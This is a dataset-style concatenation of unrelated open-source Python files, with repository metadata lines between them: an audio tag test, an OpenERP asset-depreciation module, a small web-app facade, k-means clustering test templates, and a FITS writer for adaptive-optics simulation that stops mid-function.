image_type = 4
description = 'testing'
tag_data = asf.pack_image(mime, image_data, image_type, description)
expected_length = 5 + 2 * len(mime) + 2 + 2 * len(description) + 2 + len(image_data)
self.assertEqual(tag_data[0], image_type)
self.assertEqual(len(tag_data), expected_length)
self.assertEqual(image_data, tag_data[-len(image_data):])
unpacked = asf.unpack_image(tag_data)
self.assertEqual(mime, unpacked[0])
self.assertEqual(image_data, unpacked[1])
self.assertEqual(image_type, unpacked[2])
self.assertEqual(description, unpacked[3])
def test_pack_image(self):
for args, expected in self.test_cases:
self.assertEqual(expected, asf.pack_image(*args))
def test_unpack_image(self):
for expected, packed in self.test_cases:
self.assertEqual(expected, asf.unpack_image(packed))
def test_unpack_image_value_errors(self):
self.assertRaisesRegex(ValueError, "unpack_from requires a buffer of at least 5 bytes",
asf.unpack_image, b'')
self.assertRaisesRegex(ValueError, "unpack_from requires a buffer of at least 5 bytes",
asf.unpack_image, b'\x02\x01\x00\x00')
self.assertRaisesRegex(ValueError, "mime: missing data",
asf.unpack_image, b'\x00\x00\x00\x00\x00')
self.assertRaisesRegex(ValueError, "mime: missing data",
asf.unpack_image, b'\x04\x19\x00\x00\x00a\x00')
self.assertRaisesRegex(ValueError, "desc: missing data",
asf.unpack_image, b'\x04\x19\x00\x00\x00a\x00\x00\x00a\x00')
self.assertRaisesRegex(ValueError, "image data size mismatch",
asf.unpack_image, b'\x04\x19\x00\x00\x00a\x00\x00\x00a\x00\x00\x00x')
class AsfCoverArtTest(CommonCoverArtTests.CoverArtTestCase):
testfile = 'test.asf'
class WmaCoverArtTest(CommonCoverArtTests.CoverArtTestCase):
testfile = 'test.wma'
|
Sophist-UK/Sophist_picard
|
test/formats/test_asf.py
|
Python
|
gpl-2.0
| 6,957 | 0.00115 |
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from datetime import datetime
from dateutil.relativedelta import relativedelta
from openerp.osv import fields, osv
import openerp.addons.decimal_precision as dp
from openerp.tools.translate import _
class account_asset_category(osv.osv):
_name = 'account.asset.category'
_description = 'Asset category'
_columns = {
'name': fields.char('Name', size=64, required=True, select=1),
'note': fields.text('Note'),
'account_analytic_id': fields.many2one('account.analytic.account', 'Analytic account'),
'account_asset_id': fields.many2one('account.account', 'Asset Account', required=True, domain=[('type','=','other')]),
'account_depreciation_id': fields.many2one('account.account', 'Depreciation Account', required=True, domain=[('type','=','other')]),
'account_expense_depreciation_id': fields.many2one('account.account', 'Depr. Expense Account', required=True, domain=[('type','=','other')]),
'journal_id': fields.many2one('account.journal', 'Journal', required=True),
'company_id': fields.many2one('res.company', 'Company', required=True),
'method': fields.selection([('linear','Linear'),('degressive','Degressive')], 'Computation Method', required=True, help="Choose the method to use to compute the amount of depreciation lines.\n"\
" * Linear: Calculated on basis of: Gross Value / Number of Depreciations\n" \
" * Degressive: Calculated on basis of: Residual Value * Degressive Factor"),
'method_number': fields.integer('Number of Depreciations', help="The number of depreciations needed to depreciate your asset"),
'method_period': fields.integer('Period Length', help="State here the time between 2 depreciations, in months", required=True),
'method_progress_factor': fields.float('Degressive Factor'),
'method_time': fields.selection([('number','Number of Depreciations'),('end','Ending Date')], 'Time Method', required=True,
help="Choose the method to use to compute the dates and number of depreciation lines.\n"\
" * Number of Depreciations: Fix the number of depreciation lines and the time between 2 depreciations.\n" \
" * Ending Date: Choose the time between 2 depreciations and the date the depreciations won't go beyond."),
'method_end': fields.date('Ending date'),
'prorata':fields.boolean('Prorata Temporis', help='Indicates that the first depreciation entry for this asset have to be done from the purchase date instead of the first January'),
'open_asset': fields.boolean('Skip Draft State', help="Check this if you want to automatically confirm the assets of this category when created by invoices."),
}
_defaults = {
'company_id': lambda self, cr, uid, context: self.pool.get('res.company')._company_default_get(cr, uid, 'account.asset.category', context=context),
'method': 'linear',
'method_number': 5,
'method_time': 'number',
'method_period': 12,
'method_progress_factor': 0.3,
}
def onchange_account_asset(self, cr, uid, ids, account_asset_id, context=None):
res = {'value':{}}
if account_asset_id:
res['value'] = {'account_depreciation_id': account_asset_id}
return res
class account_asset_asset(osv.osv):
_name = 'account.asset.asset'
_description = 'Asset'
def unlink(self, cr, uid, ids, context=None):
for asset in self.browse(cr, uid, ids, context=context):
if asset.account_move_line_ids:
raise osv.except_osv(_('Error!'), _('You cannot delete an asset that contains posted depreciation lines.'))
return super(account_asset_asset, self).unlink(cr, uid, ids, context=context)
def _get_period(self, cr, uid, context=None):
periods = self.pool.get('account.period').find(cr, uid, context=context)
if periods:
return periods[0]
else:
return False
def _get_last_depreciation_date(self, cr, uid, ids, context=None):
"""
@param id: ids of a account.asset.asset objects
@return: Returns a dictionary of the effective dates of the last depreciation entry made for given asset ids. If there isn't any, return the purchase date of this asset
"""
cr.execute("""
SELECT a.id as id, COALESCE(MAX(l.date),a.purchase_date) AS date
FROM account_asset_asset a
LEFT JOIN account_move_line l ON (l.asset_id = a.id)
WHERE a.id IN %s
GROUP BY a.id, a.purchase_date """, (tuple(ids),))
return dict(cr.fetchall())
def _compute_board_amount(self, cr, uid, asset, i, residual_amount, amount_to_depr, undone_dotation_number, posted_depreciation_line_ids, total_days, depreciation_date, context=None):
#by default amount = 0
amount = 0
if i == undone_dotation_number:
amount = residual_amount
else:
if asset.method == 'linear':
amount = amount_to_depr / (undone_dotation_number - len(posted_depreciation_line_ids))
if asset.prorata:
amount = amount_to_depr / asset.method_number
days = total_days - float(depreciation_date.strftime('%j'))
if i == 1:
amount = (amount_to_depr / asset.method_number) / total_days * days
elif i == undone_dotation_number:
amount = (amount_to_depr / asset.method_number) / total_days * (total_days - days)
elif asset.method == 'degressive':
amount = residual_amount * asset.method_progress_factor
if asset.prorata:
days = total_days - float(depreciation_date.strftime('%j'))
if i == 1:
amount = (residual_amount * asset.method_progress_factor) / total_days * days
elif i == undone_dotation_number:
amount = (residual_amount * asset.method_progress_factor) / total_days * (total_days - days)
return amount
def _compute_board_undone_dotation_nb(self, cr, uid, asset, depreciation_date, total_days, context=None):
undone_dotation_number = asset.method_number
if asset.method_time == 'end':
end_date = datetime.strptime(asset.method_end, '%Y-%m-%d')
undone_dotation_number = 0
while depreciation_date <= end_date:
depreciation_date = (datetime(depreciation_date.year, depreciation_date.month, depreciation_date.day) + relativedelta(months=+asset.method_period))
undone_dotation_number += 1
if asset.prorata:
undone_dotation_number += 1
return undone_dotation_number
def compute_depreciation_board(self, cr, uid, ids, context=None):
depreciation_lin_obj = self.pool.get('account.asset.depreciation.line')
currency_obj = self.pool.get('res.currency')
for asset in self.browse(cr, uid, ids, context=context):
if asset.value_residual == 0.0:
continue
posted_depreciation_line_ids = depreciation_lin_obj.search(cr, uid, [('asset_id', '=', asset.id), ('move_check', '=', True)],order='depreciation_date desc')
old_depreciation_line_ids = depreciation_lin_obj.search(cr, uid, [('asset_id', '=', asset.id), ('move_id', '=', False)])
if old_depreciation_line_ids:
depreciation_lin_obj.unlink(cr, uid, old_depreciation_line_ids, context=context)
amount_to_depr = residual_amount = asset.value_residual
if asset.prorata:
depreciation_date = datetime.strptime(self._get_last_depreciation_date(cr, uid, [asset.id], context)[asset.id], '%Y-%m-%d')
else:
# depreciation_date = 1st January of purchase year
purchase_date = datetime.strptime(asset.purchase_date, '%Y-%m-%d')
#if we already have some previous validated entries, starting date isn't 1st January but last entry + method period
if (len(posted_depreciation_line_ids)>0):
last_depreciation_date = datetime.strptime(depreciation_lin_obj.browse(cr,uid,posted_depreciation_line_ids[0],context=context).depreciation_date, '%Y-%m-%d')
depreciation_date = (last_depreciation_date+relativedelta(months=+asset.method_period))
else:
depreciation_date = datetime(purchase_date.year, 1, 1)
day = depreciation_date.day
month = depreciation_date.month
year = depreciation_date.year
total_days = (year % 4) and 365 or 366
undone_dotation_number = self._compute_board_undone_dotation_nb(cr, uid, asset, depreciation_date, total_days, context=context)
for x in range(len(posted_depreciation_line_ids), undone_dotation_number):
i = x + 1
amount = self._compute_board_amount(cr, uid, asset, i, residual_amount, amount_to_depr, undone_dotation_number, posted_depreciation_line_ids, total_days, depreciation_date, context=context)
company_currency = asset.company_id.currency_id.id
current_currency = asset.currency_id.id
# compute amount into company currency
amount = currency_obj.compute(cr, uid, current_currency, company_currency, amount, context=context)
residual_amount -= amount
vals = {
'amount': amount,
'asset_id': asset.id,
'sequence': i,
'name': str(asset.id) +'/' + str(i),
'remaining_value': residual_amount,
'depreciated_value': (asset.purchase_value - asset.salvage_value) - (residual_amount + amount),
'depreciation_date': depreciation_date.strftime('%Y-%m-%d'),
}
depreciation_lin_obj.create(cr, uid, vals, context=context)
# Considering Depr. Period as months
depreciation_date = (datetime(year, month, day) + relativedelta(months=+asset.method_period))
day = depreciation_date.day
month = depreciation_date.month
year = depreciation_date.year
return True
def validate(self, cr, uid, ids, context=None):
if context is None:
context = {}
return self.write(cr, uid, ids, {
'state':'open'
}, context)
def set_to_close(self, cr, uid, ids, context=None):
return self.write(cr, uid, ids, {'state': 'close'}, context=context)
def set_to_draft(self, cr, uid, ids, context=None):
return self.write(cr, uid, ids, {'state': 'draft'}, context=context)
def _amount_residual(self, cr, uid, ids, name, args, context=None):
cr.execute("""SELECT
l.asset_id as id, SUM(abs(l.debit-l.credit)) AS amount
FROM
account_move_line l
WHERE
l.asset_id IN %s GROUP BY l.asset_id """, (tuple(ids),))
res=dict(cr.fetchall())
for asset in self.browse(cr, uid, ids, context):
res[asset.id] = asset.purchase_value - res.get(asset.id, 0.0) - asset.salvage_value
for id in ids:
res.setdefault(id, 0.0)
return res
def onchange_company_id(self, cr, uid, ids, company_id=False, context=None):
val = {}
if company_id:
company = self.pool.get('res.company').browse(cr, uid, company_id, context=context)
if company.currency_id.company_id and company.currency_id.company_id.id != company_id:
val['currency_id'] = False
else:
val['currency_id'] = company.currency_id.id
return {'value': val}
def onchange_purchase_salvage_value(self, cr, uid, ids, purchase_value, salvage_value, context=None):
val = {}
for asset in self.browse(cr, uid, ids, context=context):
if purchase_value:
val['value_residual'] = purchase_value - salvage_value
if salvage_value:
val['value_residual'] = purchase_value - salvage_value
return {'value': val}
_columns = {
'account_move_line_ids': fields.one2many('account.move.line', 'asset_id', 'Entries', readonly=True, states={'draft':[('readonly',False)]}),
'name': fields.char('Asset Name', size=64, required=True, readonly=True, states={'draft':[('readonly',False)]}),
'code': fields.char('Reference', size=32, readonly=True, states={'draft':[('readonly',False)]}),
'purchase_value': fields.float('Gross Value', required=True, readonly=True, states={'draft':[('readonly',False)]}),
'currency_id': fields.many2one('res.currency','Currency',required=True, readonly=True, states={'draft':[('readonly',False)]}),
'company_id': fields.many2one('res.company', 'Company', required=True, readonly=True, states={'draft':[('readonly',False)]}),
'note': fields.text('Note'),
'category_id': fields.many2one('account.asset.category', 'Asset Category', required=True, change_default=True, readonly=True, states={'draft':[('readonly',False)]}),
'parent_id': fields.many2one('account.asset.asset', 'Parent Asset', readonly=True, states={'draft':[('readonly',False)]}),
'child_ids': fields.one2many('account.asset.asset', 'parent_id', 'Children Assets'),
'purchase_date': fields.date('Purchase Date', required=True, readonly=True, states={'draft':[('readonly',False)]}),
'state': fields.selection([('draft','Draft'),('open','Running'),('close','Close')], 'Status', required=True,
help="When an asset is created, the status is 'Draft'.\n" \
"If the asset is confirmed, the status goes in 'Running' and the depreciation lines can be posted in the accounting.\n" \
"You can manually close an asset when the depreciation is over. If the last line of depreciation is posted, the asset automatically goes in that status."),
'active': fields.boolean('Active'),
'partner_id': fields.many2one('res.partner', 'Partner', readonly=True, states={'draft':[('readonly',False)]}),
'method': fields.selection([('linear','Linear'),('degressive','Degressive')], 'Computation Method', required=True, readonly=True, states={'draft':[('readonly',False)]}, help="Choose the method to use to compute the amount of depreciation lines.\n"\
" * Linear: Calculated on basis of: Gross Value / Number of Depreciations\n" \
" * Degressive: Calculated on basis of: Residual Value * Degressive Factor"),
'method_number': fields.integer('Number of Depreciations', readonly=True, states={'draft':[('readonly',False)]}, help="The number of depreciations needed to depreciate your asset"),
'method_period': fields.integer('Number of Months in a Period', required=True, readonly=True, states={'draft':[('readonly',False)]}, help="The amount of time between two depreciations, in months"),
'method_end': fields.date('Ending Date', readonly=True, states={'draft':[('readonly',False)]}),
'method_progress_factor': fields.float('Degressive Factor', readonly=True, states={'draft':[('readonly',False)]}),
'value_residual': fields.function(_amount_residual, method=True, digits_compute=dp.get_precision('Account'), string='Residual Value'),
'method_time': fields.selection([('number','Number of Depreciations'),('end','Ending Date')], 'Time Method', required=True, readonly=True, states={'draft':[('readonly',False)]},
help="Choose the method to use to compute the dates and number of depreciation lines.\n"\
" * Number of Depreciations: Fix the number of depreciation lines and the time between 2 depreciations.\n" \
" * Ending Date: Choose the time between 2 depreciations and the date the depreciations won't go beyond."),
'prorata':fields.boolean('Prorata Temporis', readonly=True, states={'draft':[('readonly',False)]}, help='Indicates that the first depreciation entry for this asset have to be done from the purchase date instead of the first January'),
'history_ids': fields.one2many('account.asset.history', 'asset_id', 'History', readonly=True),
'depreciation_line_ids': fields.one2many('account.asset.depreciation.line', 'asset_id', 'Depreciation Lines', readonly=True, states={'draft':[('readonly',False)],'open':[('readonly',False)]}),
'salvage_value': fields.float('Salvage Value', digits_compute=dp.get_precision('Account'), help="It is the amount you plan to have that you cannot depreciate.", readonly=True, states={'draft':[('readonly',False)]}),
}
_defaults = {
'code': lambda obj, cr, uid, context: obj.pool.get('ir.sequence').get(cr, uid, 'account.asset.code'),
'purchase_date': lambda obj, cr, uid, context: time.strftime('%Y-%m-%d'),
'active': True,
'state': 'draft',
'method': 'linear',
'method_number': 5,
'method_time': 'number',
'method_period': 12,
'method_progress_factor': 0.3,
'currency_id': lambda self,cr,uid,c: self.pool.get('res.users').browse(cr, uid, uid, c).company_id.currency_id.id,
'company_id': lambda self, cr, uid, context: self.pool.get('res.company')._company_default_get(cr, uid, 'account.asset.asset',context=context),
}
def _check_recursion(self, cr, uid, ids, context=None, parent=None):
return super(account_asset_asset, self)._check_recursion(cr, uid, ids, context=context, parent=parent)
def _check_prorata(self, cr, uid, ids, context=None):
for asset in self.browse(cr, uid, ids, context=context):
if asset.prorata and asset.method_time != 'number':
return False
return True
_constraints = [
(_check_recursion, 'Error ! You cannot create recursive assets.', ['parent_id']),
(_check_prorata, 'Prorata temporis can be applied only for time method "number of depreciations".', ['prorata']),
]
def onchange_category_id(self, cr, uid, ids, category_id, context=None):
res = {'value':{}}
asset_categ_obj = self.pool.get('account.asset.category')
if category_id:
category_obj = asset_categ_obj.browse(cr, uid, category_id, context=context)
res['value'] = {
'method': category_obj.method,
'method_number': category_obj.method_number,
'method_time': category_obj.method_time,
'method_period': category_obj.method_period,
'method_progress_factor': category_obj.method_progress_factor,
'method_end': category_obj.method_end,
'prorata': category_obj.prorata,
}
return res
def onchange_method_time(self, cr, uid, ids, method_time='number', context=None):
res = {'value': {}}
if method_time != 'number':
res['value'] = {'prorata': False}
return res
def copy(self, cr, uid, id, default=None, context=None):
if default is None:
default = {}
if context is None:
context = {}
default.update({'depreciation_line_ids': [], 'state': 'draft'})
return super(account_asset_asset, self).copy(cr, uid, id, default, context=context)
def _compute_entries(self, cr, uid, ids, period_id, context=None):
result = []
period_obj = self.pool.get('account.period')
depreciation_obj = self.pool.get('account.asset.depreciation.line')
period = period_obj.browse(cr, uid, period_id, context=context)
depreciation_ids = depreciation_obj.search(cr, uid, [('asset_id', 'in', ids), ('depreciation_date', '<=', period.date_stop), ('depreciation_date', '>=', period.date_start), ('move_check', '=', False)], context=context)
if context is None:
context = {}
context.update({'depreciation_date':period.date_stop})
return depreciation_obj.create_move(cr, uid, depreciation_ids, context=context)
def create(self, cr, uid, vals, context=None):
asset_id = super(account_asset_asset, self).create(cr, uid, vals, context=context)
self.compute_depreciation_board(cr, uid, [asset_id], context=context)
return asset_id
def open_entries(self, cr, uid, ids, context=None):
if context is None:
context = {}
context.update({'search_default_asset_id': ids, 'default_asset_id': ids})
return {
'name': _('Journal Items'),
'view_type': 'form',
'view_mode': 'tree,form',
'res_model': 'account.move.line',
'view_id': False,
'type': 'ir.actions.act_window',
'context': context,
}
class account_asset_depreciation_line(osv.osv):
_name = 'account.asset.depreciation.line'
_description = 'Asset depreciation line'
def _get_move_check(self, cr, uid, ids, name, args, context=None):
res = {}
for line in self.browse(cr, uid, ids, context=context):
res[line.id] = bool(line.move_id)
return res
_columns = {
'name': fields.char('Depreciation Name', size=64, required=True, select=1),
'sequence': fields.integer('Sequence', required=True),
'asset_id': fields.many2one('account.asset.asset', 'Asset', required=True, ondelete='cascade'),
'parent_state': fields.related('asset_id', 'state', type='char', string='State of Asset'),
'amount': fields.float('Current Depreciation', digits_compute=dp.get_precision('Account'), required=True),
'remaining_value': fields.float('Next Period Depreciation', digits_compute=dp.get_precision('Account'),required=True),
'depreciated_value': fields.float('Amount Already Depreciated', required=True),
'depreciation_date': fields.date('Depreciation Date', select=1),
'move_id': fields.many2one('account.move', 'Depreciation Entry'),
'move_check': fields.function(_get_move_check, method=True, type='boolean', string='Posted', store=True)
}
def create_move(self, cr, uid, ids, context=None):
can_close = False
if context is None:
context = {}
asset_obj = self.pool.get('account.asset.asset')
period_obj = self.pool.get('account.period')
move_obj = self.pool.get('account.move')
move_line_obj = self.pool.get('account.move.line')
currency_obj = self.pool.get('res.currency')
created_move_ids = []
asset_ids = []
for line in self.browse(cr, uid, ids, context=context):
depreciation_date = context.get('depreciation_date') or time.strftime('%Y-%m-%d')
period_ids = period_obj.find(cr, uid, depreciation_date, context=context)
company_currency = line.asset_id.company_id.currency_id.id
current_currency = line.asset_id.currency_id.id
context.update({'date': depreciation_date})
amount = currency_obj.compute(cr, uid, current_currency, company_currency, line.amount, context=context)
sign = (line.asset_id.category_id.journal_id.type == 'purchase' and 1) or -1
asset_name = line.asset_id.name
reference = line.name
move_vals = {
'name': asset_name,
'date': depreciation_date,
'ref': reference,
'period_id': period_ids and period_ids[0] or False,
'journal_id': line.asset_id.category_id.journal_id.id,
}
move_id = move_obj.create(cr, uid, move_vals, context=context)
journal_id = line.asset_id.category_id.journal_id.id
partner_id = line.asset_id.partner_id.id
move_line_obj.create(cr, uid, {
'name': asset_name,
'ref': reference,
'move_id': move_id,
'account_id': line.asset_id.category_id.account_depreciation_id.id,
'debit': 0.0,
'credit': amount,
'period_id': period_ids and period_ids[0] or False,
'journal_id': journal_id,
'partner_id': partner_id,
'currency_id': company_currency != current_currency and current_currency or False,
'amount_currency': company_currency != current_currency and - sign * line.amount or 0.0,
'date': depreciation_date,
})
move_line_obj.create(cr, uid, {
'name': asset_name,
'ref': reference,
'move_id': move_id,
'account_id': line.asset_id.category_id.account_expense_depreciation_id.id,
'credit': 0.0,
'debit': amount,
'period_id': period_ids and period_ids[0] or False,
'journal_id': journal_id,
'partner_id': partner_id,
'currency_id': company_currency != current_currency and current_currency or False,
'amount_currency': company_currency != current_currency and sign * line.amount or 0.0,
'analytic_account_id': line.asset_id.category_id.account_analytic_id.id,
'date': depreciation_date,
'asset_id': line.asset_id.id
})
self.write(cr, uid, line.id, {'move_id': move_id}, context=context)
created_move_ids.append(move_id)
asset_ids.append(line.asset_id.id)
# we re-evaluate the assets to determine whether we can close them
for asset in asset_obj.browse(cr, uid, list(set(asset_ids)), context=context):
if currency_obj.is_zero(cr, uid, asset.currency_id, asset.value_residual):
asset.write({'state': 'close'})
return created_move_ids
class account_move_line(osv.osv):
_inherit = 'account.move.line'
_columns = {
'asset_id': fields.many2one('account.asset.asset', 'Asset', ondelete="restrict"),
'entry_ids': fields.one2many('account.move.line', 'asset_id', 'Entries', readonly=True, states={'draft':[('readonly',False)]}),
}
class account_asset_history(osv.osv):
_name = 'account.asset.history'
_description = 'Asset history'
_columns = {
'name': fields.char('History name', size=64, select=1),
'user_id': fields.many2one('res.users', 'User', required=True),
'date': fields.date('Date', required=True),
'asset_id': fields.many2one('account.asset.asset', 'Asset', required=True),
'method_time': fields.selection([('number','Number of Depreciations'),('end','Ending Date')], 'Time Method', required=True,
help="The method to use to compute the dates and number of depreciation lines.\n"\
"Number of Depreciations: Fix the number of depreciation lines and the time between 2 depreciations.\n" \
"Ending Date: Choose the time between 2 depreciations and the date the depreciations won't go beyond."),
'method_number': fields.integer('Number of Depreciations', help="The number of depreciations needed to depreciate your asset"),
'method_period': fields.integer('Period Length', help="Time in month between two depreciations"),
'method_end': fields.date('Ending date'),
'note': fields.text('Note'),
}
_order = 'date desc'
_defaults = {
'date': lambda *args: time.strftime('%Y-%m-%d'),
'user_id': lambda self, cr, uid, ctx: uid
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
ttfseiko/openerp-trunk
|
openerp/addons/account_asset/account_asset.py
|
Python
|
agpl-3.0
| 29,177 | 0.008568 |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from gaegraph.business_base import NodeSearch, DeleteNode
from classificacaodtm_app.commands import ListClassificacaodtmCommand, SaveClassificacaodtmCommand, UpdateClassificacaodtmCommand, \
ClassificacaodtmPublicForm, ClassificacaodtmDetailForm, ClassificacaodtmShortForm
def save_classificacaodtm_cmd(**classificacaodtm_properties):
"""
Command to save Classificacaodtm entity
:param classificacaodtm_properties: a dict of properties to save on model
:return: a Command that save Classificacaodtm, validating and localizing properties received as strings
"""
return SaveClassificacaodtmCommand(**classificacaodtm_properties)
def update_classificacaodtm_cmd(classificacaodtm_id, **classificacaodtm_properties):
"""
Command to update Classificacaodtm entity with id equals 'classificacaodtm_id'
:param classificacaodtm_properties: a dict of properties to update model
:return: a Command that update Classificacaodtm, validating and localizing properties received as strings
"""
return UpdateClassificacaodtmCommand(classificacaodtm_id, **classificacaodtm_properties)
def list_classificacaodtms_cmd():
"""
Command to list Classificacaodtm entities ordered by their creation dates
:return: a Command proceed the db operations when executed
"""
return ListClassificacaodtmCommand()
def classificacaodtm_detail_form(**kwargs):
"""
Function to get Classificacaodtm's detail form.
:param kwargs: form properties
:return: Form
"""
return ClassificacaodtmDetailForm(**kwargs)
def classificacaodtm_short_form(**kwargs):
"""
Function to get Classificacaodtm's short form. just a subset of classificacaodtm's properties
:param kwargs: form properties
:return: Form
"""
return ClassificacaodtmShortForm(**kwargs)
def classificacaodtm_public_form(**kwargs):
"""
Function to get Classificacaodtm'spublic form. just a subset of classificacaodtm's properties
:param kwargs: form properties
:return: Form
"""
return ClassificacaodtmPublicForm(**kwargs)
def get_classificacaodtm_cmd(classificacaodtm_id):
"""
Find classificacaodtm by her id
:param classificacaodtm_id: the classificacaodtm id
:return: Command
"""
return NodeSearch(classificacaodtm_id)
def delete_classificacaodtm_cmd(classificacaodtm_id):
"""
Construct a command to delete a Classificacaodtm
:param classificacaodtm_id: classificacaodtm's id
:return: Command
"""
return DeleteNode(classificacaodtm_id)
|
andersonsilvade/5semscript
|
Projeto/backend/apps/classificacaodtm_app/facade.py
|
Python
|
mit
| 2,641 | 0.004165 |
"""!
@brief Test templates for K-Means clustering module.
@authors Andrei Novikov ([email protected])
@date 2014-2020
@copyright BSD-3-Clause
"""
from pyclustering.tests.assertion import assertion
from pyclustering.cluster.encoder import type_encoding, cluster_encoder
from pyclustering.cluster.kmeans import kmeans, kmeans_observer, kmeans_visualizer
from pyclustering.utils import read_sample
from pyclustering.utils.metric import distance_metric, type_metric
from random import random
import numpy
class KmeansTestTemplates:
@staticmethod
def templateLengthProcessData(data, start_centers, expected_cluster_length, ccore, **kwargs):
if isinstance(data, str):
sample = read_sample(data)
else:
sample = data
metric = kwargs.get('metric', distance_metric(type_metric.EUCLIDEAN_SQUARE))
itermax = kwargs.get('itermax', 200)
kmeans_instance = kmeans(sample, start_centers, 0.001, ccore, metric=metric, itermax=itermax)
kmeans_instance.process()
clusters = kmeans_instance.get_clusters()
centers = kmeans_instance.get_centers()
wce = kmeans_instance.get_total_wce()
if itermax == 0:
assertion.eq(start_centers, centers)
assertion.eq([], clusters)
assertion.eq(0.0, wce)
return
expected_wce = 0.0
for index_cluster in range(len(clusters)):
for index_point in clusters[index_cluster]:
expected_wce += metric(sample[index_point], centers[index_cluster])
assertion.eq(expected_wce, wce)
obtained_cluster_sizes = [len(cluster) for cluster in clusters]
assertion.eq(len(sample), sum(obtained_cluster_sizes))
assertion.eq(len(clusters), len(centers))
for center in centers:
assertion.eq(len(sample[0]), len(center))
if expected_cluster_length is not None:
obtained_cluster_sizes.sort()
expected_cluster_length.sort()
assertion.eq(obtained_cluster_sizes, expected_cluster_length)
@staticmethod
def templatePredict(path_to_file, initial_centers, points, expected_closest_clusters, ccore, **kwargs):
sample = read_sample(path_to_file)
metric = kwargs.get('metric', distance_metric(type_metric.EUCLIDEAN_SQUARE))
itermax = kwargs.get('itermax', 200)
kmeans_instance = kmeans(sample, initial_centers, 0.001, ccore, metric=metric, itermax=itermax)
kmeans_instance.process()
closest_clusters = kmeans_instance.predict(points)
assertion.eq(len(expected_closest_clusters), len(closest_clusters))
assertion.true(numpy.array_equal(numpy.array(expected_closest_clusters), closest_clusters))
@staticmethod
def templateClusterAllocationOneDimensionData(ccore_flag):
input_data = [ [random()] for _ in range(10) ] + [ [random() + 3] for _ in range(10) ] + [ [random() + 5] for _ in range(10) ] + [ [random() + 8] for _ in range(10) ]
kmeans_instance = kmeans(input_data, [ [0.0], [3.0], [5.0], [8.0] ], 0.025, ccore_flag)
kmeans_instance.process()
clusters = kmeans_instance.get_clusters()
assertion.eq(4, len(clusters))
for cluster in clusters:
assertion.eq(10, len(cluster))
@staticmethod
def templateEncoderProcedures(filename, initial_centers, number_clusters, ccore_flag):
sample = read_sample(filename)
kmeans_instance = kmeans(sample, initial_centers, 0.025, ccore_flag)
kmeans_instance.process()
clusters = kmeans_instance.get_clusters()
encoding = kmeans_instance.get_cluster_encoding()
encoder = cluster_encoder(encoding, clusters, sample)
encoder.set_encoding(type_encoding.CLUSTER_INDEX_LABELING)
encoder.set_encoding(type_encoding.CLUSTER_OBJECT_LIST_SEPARATION)
encoder.set_encoding(type_encoding.CLUSTER_INDEX_LIST_SEPARATION)
assertion.eq(number_clusters, len(clusters))
@staticmethod
def templateCollectEvolution(filename, initial_centers, number_clusters, ccore_flag):
sample = read_sample(filename)
observer = kmeans_observer()
kmeans_instance = kmeans(sample, initial_centers, 0.025, ccore_flag, observer=observer)
kmeans_instance.process()
assertion.le(1, len(observer))
for i in range(len(observer)):
assertion.le(1, len(observer.get_centers(i)))
for center in observer.get_centers(i):
assertion.eq(len(sample[0]), len(center))
assertion.le(1, len(observer.get_clusters(i)))
@staticmethod
def templateShowClusteringResultNoFailure(filename, initial_centers, ccore_flag):
sample = read_sample(filename)
kmeans_instance = kmeans(sample, initial_centers, 0.025, ccore_flag)
kmeans_instance.process()
clusters = kmeans_instance.get_clusters()
centers = kmeans_instance.get_centers()
figure = kmeans_visualizer.show_clusters(sample, clusters, centers, initial_centers)
kmeans_visualizer.close(figure)
@staticmethod
def templateAnimateClusteringResultNoFailure(filename, initial_centers, ccore_flag):
sample = read_sample(filename)
observer = kmeans_observer()
kmeans_instance = kmeans(sample, initial_centers, 0.025, ccore_flag, observer=observer)
kmeans_instance.process()
kmeans_visualizer.animate_cluster_allocation(sample, observer)
|
annoviko/pyclustering
|
pyclustering/cluster/tests/kmeans_templates.py
|
Python
|
gpl-3.0
| 5,793 | 0.008113 |
import numpy as np
from shesha.util.writers.common import dm
from shesha.util.writers.common import wfs
from shesha.util.writers.common import imat
from astropy.io import fits
def wfs_to_fits_hdu(sup, wfs_id):
"""Return a fits Header Data Unit (HDU) representation of a single WFS
Args:
sup : (compasSSupervisor) : supervisor
wfs_id : (int) : index of the WFS in the supervisor
Returns:
hdu : (ImageHDU) : fits representation of the WFS
"""
hdu_name = "WFS" + str(wfs_id)
X,Y = wfs.get_subap_pos_meter(sup, wfs_id)
valid_subap = np.array([X,Y],dtype=np.float64)
hdu = fits.ImageHDU( valid_subap, name=hdu_name)
hdu.header["NSSP"] = sup.config.p_wfss[wfs_id].get_nxsub()
hdu.header["SSPSIZE"] = sup.config.p_wfss[wfs_id].get_subapd()
return hdu
def dm_to_fits_hdu(sup, dm_id):
"""Return a fits Header Data Unit (HDU) representation of a single DM
Args:
sup : (compasSSupervisor) : supervisor
wfs_id : (int) : index of the DM in the supervisor
Returns:
hdu : (ImageHDU) : fits representation of the DM
"""
hdu_name = "DM" + str(dm_id)
X,Y = dm.get_actu_pos_meter(sup, dm_id)
valid_subap = np.array([X,Y],dtype=np.float64)
hdu = fits.ImageHDU( valid_subap, name=hdu_name)
hdu.header["NACTU"] = sup.config.p_dms[dm_id].get_nact()
hdu.header["PITCH"] = sup.config.p_dms[dm_id].get_pitch()
hdu.header["COUPLING"] = sup.config.p_dms[dm_id].get_coupling()
hdu.header["ALT"] = sup.config.p_dms[dm_id].get_alt()
return hdu
def dm_influ_to_fits_hdu(sup, dm_id, *, influ_index=-1):
"""Return a fits Header Data Unit (HDU) holding the influence functions of a specific DM
Args:
sup : (compasSSupervisor) : supervisor
wfs_id : (int) : index of the DM in the supervisor
Kwargs:
influ_index : (int) : (optional) default -1, index of the actuator to get the influence function from. -1 : get all influence functions
Returns:
hdu : (ImageHDU) : hdu holding the DM influence functions
"""
hdu_name = "INFLU_DM" + str(dm_id)
if influ_index < 0 :
